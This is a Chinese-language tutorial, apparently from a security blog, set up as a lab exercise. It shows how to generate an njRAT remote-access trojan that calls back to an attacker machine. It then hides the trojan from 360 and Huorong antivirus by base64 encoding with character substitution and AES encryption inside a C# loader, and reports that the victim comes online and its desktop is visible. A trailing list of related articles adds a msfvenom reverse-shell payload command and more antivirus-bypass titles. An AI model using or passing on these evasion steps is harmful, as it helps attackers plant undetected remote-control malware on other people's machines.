实验环境

攻击机: win7 IP: 192.168.32.134
靶机: windows server 2012(安装360、火绒) IP: 192.168.32.133

一、生成客户端exe木马

第一步:使用njRAT生产一个客户端exe木马
输入回连端口号8888,点击start

配置客户端木马的回连地址:192.168.32.134

将文件保存在桌面

开启360杀毒,直接报毒,不免杀

二、对客户端exe木马使用加解密替换方法进行免杀

1、将生成的客户端木马:Server.exe在 Encryption Tool V3.0中以base64加密方式打开

打开之后,将base64加密之后的文件中的所有字母A替换成#

将base64加密之后的文件中的所有字母T替换成*

替换完成之后,保存成1.txt文件



将1.txt文件中的内容,复制粘贴到下图所示位置

添加该程序代码需要的引用文件

按照下图所示,添加完引用文件之后,点击确定

点击 Properties 按照下图所示配置好,将此代码生成控制台应用程序

点击生成,如下图所示表示客户端程序exe程序生成完成

将生成的程序 CsharpEncryptionDecryptor.exe 复制到带有 360、火绒杀软的服务器中,并且开启杀软进行查杀,均未报毒,成功免杀



在靶机中双击免杀的客户端exe文件:CsharpEncryptionDecryptor.exe

在win7电脑上查看,发现靶机成功上线


查看靶机的电脑桌面


免杀原理:
将生成的客户端exe文件,进行base64编码,然后将base64编码之后的文本中的A替换成#,T替换成*,之后使用AES算法再次进行加密。以此绕过免杀

更多资源:
1、web安全工具、渗透测试工具、免杀工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥

绕过杀软(二)——免杀exe文件(360、火绒免杀)相关推荐

  1. 免杀Bypass!可过WDF/360/火绒的C#混淆器

    0x01 工具简介 这次分享的是一个可用于免杀过WDF/360/火绒的C#混淆器,但只能混淆.Net Framework应用程序.作者写这个工具主要是为了了解更多关于 C# 和混淆器的工作原理. 关注 ...

  2. Metasploit+python生成免杀exe过360杀毒

    Metasploit+python生成免杀exe过360杀毒 1在kali下生成一个反弹的msf的python脚本,命令如下: msfvenom -p windows/meterpreter/reve ...

  3. 【工具分享】免杀360火绒的shellcode加载器

    微信公众号:乌鸦安全 扫取二维码获取更多信息! 1. 免杀效果 该shellcode加载器目前可以过360&火绒,Windows Defender没戏... 代码和思路暂不开源! 你可以在我的 ...

  4. 二进制免杀-火绒免杀研究

    ┌──(kali㉿kali)-[~] └─$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.93.134 lport=44 ...

  5. Veil+tdm-gcc免杀360火绒瑞星

    Veil-Evasion是一个用python写的免杀框架,可以将任意脚本或一段shellcode转换成Windows可执行文件,还能利用Metasploit框架生成相兼容的Payload工具,从而逃避 ...

  6. 2023最新使用python进行shellcode免杀过360火绒 ,反虚拟机

    本源码仅供学习交流,不得用于违法范围,本源码已放到QQ交流群 群文件中QQ群:798134185 反虚拟机方案根据虚拟机系统文件 cpu核心数  开机启动时间  c盘大小判断 生成c语言的payloa ...

  7. 使用WinRAR制作免安装exe文件

    WinRAR打包成exe 在"自解压选项"–>"设置"中有"提取后运行"或者"解压后运行"选项(具体取决于rar版 ...

  8. 新手指南 手把手教你部署火绒企业杀毒

    随着企业业务对网络的依赖不断加大,企业对于网络安全的重视程度也在不断提升,但近年来各种网络攻击可以说是屡禁不止,且大有愈演愈烈之势.木马病毒.安全漏洞.勒索软件等一个个耳熟能详的名词成为企业的&quo ...

  9. 红队培训班作业 | 免杀过360和火绒 四种方法大对比

    文章来源|MS08067 红队培训班第12节课作业 本文作者:汤浩荡(红队培训班1期学员) 按老师要求尝试完成布置的作业如下: 环境准备: Kali linux安装cs4.2,Windows7系统安装 ...

  10. 红队培训班作业 | 五种免杀bypass火绒360姿势横向测评:哪款更适合你?

    文章来源|MS08067 红队培训班第12节课作业 本文作者:某学员A(红队培训班1期学员) 按老师要求尝试完成布置的作业如下: 一.远程线程注入 (一)通过MSF生成payload 通过msfven ...

最新文章

  1. 艺术站-卡通和风格化的HDRI天空
  2. c语言 swap交换函数_C语言经典100题(14)
  3. 《游戏引擎架构》笔记十四
  4. HTML期末学生大作业-乒乓球网页作业html+css+javascript
  5. Java无所不能的反射在Android中需要熟练的知识
  6. woocommerce产品选项描述修改_简历修改服务:中文修改、英文修改、中英互译、简历定制,名师一对一指导修改!...
  7. 【Fudan DISC】一种无监督下利用多模态文档结构信息帮助图片-句子匹配的采样方法...
  8. .net mysql参数化查询,ASP.NET中的mysql参数化查询
  9. c语言怎么查找中文字符,C语言自学,汉字编码范围查询!
  10. 【EDA课程设计】FPGA交通信号灯的设计(含动画视频、超详细思路/步骤分析、完整代码与效果详解)
  11. 电子海图系统线状符号表达及绘制方法
  12. Python实现王者农药自动刷金币
  13. 百度地图和51地图API应用开发
  14. 已有一个已排好序的数组,要求输入一个数,将它插入数组中,保持数组依然有序。
  15. Vue 路由导航守卫(全局守卫、路由独享守卫、组件内守卫)详解
  16. 破解TP-Link路由-嗅探PPPoE拨号密码
  17. 【android】android真机测试方法
  18. 用Helm3构建多层微服务
  19. Indian Summer
  20. 游戏代理要把用户数据和充值数据牢牢抓在自己手上

热门文章

  1. 我的第一次WebService接口开发教程
  2. oracle 错误 1013,ORA-03113错误解决一例
  3. 远程连接树莓派桌面xrdp
  4. leaflet中文文档
  5. NCM格式如何转换为Mp3-音乐格式ncm转换mp3工具
  6. 通过命名空间快速定位SAP UI5工程名称
  7. 图书信息管理系统需求分析
  8. java cloud面试题_spring cloud 面试题
  9. matlab dynprog,matlab信号处理工具箱
  10. marlab中主成分得分怎么求_线性回归中多重共线性处理——主成分分析法